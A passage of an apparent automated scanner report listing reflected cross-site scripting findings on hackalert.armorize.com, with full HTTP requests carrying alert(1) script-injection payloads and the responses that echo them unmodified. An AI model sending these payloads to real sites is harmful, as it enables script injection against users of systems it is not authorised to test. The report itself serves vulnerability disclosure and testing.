Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:15:28 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_jsd6f1f;alert(1)//6218b11bdf0/usersettings.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.120. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4863e%3balert(1)//b1f86550f23 was submitted in the REST URL parameter 4. This input was echoed as 4863e;alert(1)//b1f86550f23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js4863e%3balert(1)//b1f86550f23 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:27:01 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/usersettings.js4863e;alert(1)//b1f86550f23?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.121. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb618"-alert(1)-"ef70f00db5d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.jsbb618"-alert(1)-"ef70f00db5d HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:22:13 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/usersettings.jsbb618"-alert(1)-"ef70f00db5d?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.122. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9576"><script>alert(1)</script>5a922b5eb95 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/a9576"><script>alert(1)</script>5a922b5eb95/_js/windowFx.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:59:47 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/a9576"><script>alert(1)</script>5a922b5eb95/_js/windowFx.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.123. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d9218%3balert(1)//490f97b6515 was submitted in the REST URL parameter 2. This input was echoed as d9218;alert(1)//490f97b6515 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cd9218%3balert(1)//490f97b6515/_js/windowFx.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:06:33 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<d9218;alert(1)//490f97b6515/_js/windowFx.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.124. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4a09"-alert(1)-"e384f70b3f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Ca4a09"-alert(1)-"e384f70b3f4/_js/windowFx.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:01:30 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a4a09"-alert(1)-"e384f70b3f4/_js/windowFx.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.125. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8feba%3balert(1)//2ba498cd550 was submitted in the REST URL parameter 3. This input was echoed as 8feba;alert(1)//2ba498cd550 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js8feba%3balert(1)//2ba498cd550/windowFx.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:19:54 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js8feba;alert(1)//2ba498cd550/windowFx.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.126. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a506"-alert(1)-"b57e03bf1c7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js6a506"-alert(1)-"b57e03bf1c7/windowFx.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:14:39 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js6a506"-alert(1)-"b57e03bf1c7/windowFx.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.127. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 806b8%3balert(1)//78f6259811 was submitted in the REST URL parameter 4. This input was echoed as 806b8;alert(1)//78f6259811 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js806b8%3balert(1)//78f6259811 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:23:54 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/windowFx.js806b8;alert(1)//78f6259811?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.128. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f823b"-alert(1)-"2cce22e77ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.jsf823b"-alert(1)-"2cce22e77ac HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:22:54 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_js/windowFx.jsf823b"-alert(1)-"2cce22e77ac?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.129. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5205e"-alert(1)-"62b5fa0c680 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C5205e"-alert(1)-"62b5fa0c680/favicon.ico HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:02:41 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<5205e"-alert(1)-"62b5fa0c680/favicon.ico?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.130. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 279b5"><script>alert(1)</script>c0f57aac89d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/279b5"><script>alert(1)</script>c0f57aac89d/favicon.ico HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:00:42 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/279b5"><script>alert(1)</script>c0f57aac89d/favicon.ico?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.131. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d9303%3balert(1)//70ee3cf2d72 was submitted in the REST URL parameter 2. This input was echoed as d9303;alert(1)//70ee3cf2d72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cd9303%3balert(1)//70ee3cf2d72/favicon.ico HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:04:26 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<d9303;alert(1)//70ee3cf2d72/favicon.ico?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.132. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e828e"-alert(1)-"514b277815b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.icoe828e"-alert(1)-"514b277815b HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
